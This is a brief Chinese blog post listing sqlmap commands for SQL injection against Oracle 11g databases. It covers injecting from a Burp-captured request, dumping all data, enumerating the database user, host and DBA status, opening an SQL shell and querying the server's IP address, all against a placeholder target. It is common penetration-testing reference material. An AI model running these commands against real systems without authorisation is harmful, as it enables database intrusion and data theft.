sqlmap Oracle 11g随笔

话不多说,上码

Burp Suite 抓包注入

sqlmap -r post.txt

清除缓存记录

sqlmap -u "a.com" --flush-session --fresh-queries

获取数据库版本

sqlmap -u "a.com" -b

获取全部信息

sqlmap -u "a.com" -a

可以获取的信息

sqlmap -u "a.com" --current-db --current-user --hostname --is-dba
  • current-db: 当前程序使用的 db 的名字
  • current-user: 当前程序使用的数据库用户名
  • hostname: 当前 DB 服务器的主机名
  • is-dba: 当前程序所使用的数据库用户是不是 dba

column 包含关键字

sqlmap -u "a.com" --sql-shell

sql-shell> select table_name from user_tab_columns where COLUMN_NAME like '%keyword%';

Oracle 获取 ip 地址

sql-shell> select utl_inaddr.get_host_address from dual;

参考

https://vul-hunters.oschina.io/hunter-blogs/posts/sec-tools-sqlmap/
https://blog.51cto.com/duallay/2050094

©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

相关阅读更多精彩内容

  • sqlmap手册
    sqlmap用户手册 说明:本文为转载,对原文中一些明显的拼写错误进行修正,并标注对自己有用的信息。 ======...
    wind_飘阅读 6,367评论 0 5
  • SQLMap用户手册【超详细】
    http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 当给sq...
    xuningbo阅读 13,536评论 2 22
  • SQLMAP注入教程-11种常见SQLMAP使用方法详解
    sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工...
    linkally阅读 11,888评论 1 40
  • sqlmap11种常用方法教学
    sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工...
    查无此人asdasd阅读 5,435评论 0 1
  • SQLmap用法
    SQLMAP作用 判断可注入的参数 判断可以用哪种SQL注入技术来注入 识别出哪种数据库 根据用户选择,读取哪些数...
    陆洒脱阅读 9,101评论 1 4

友情链接更多精彩内容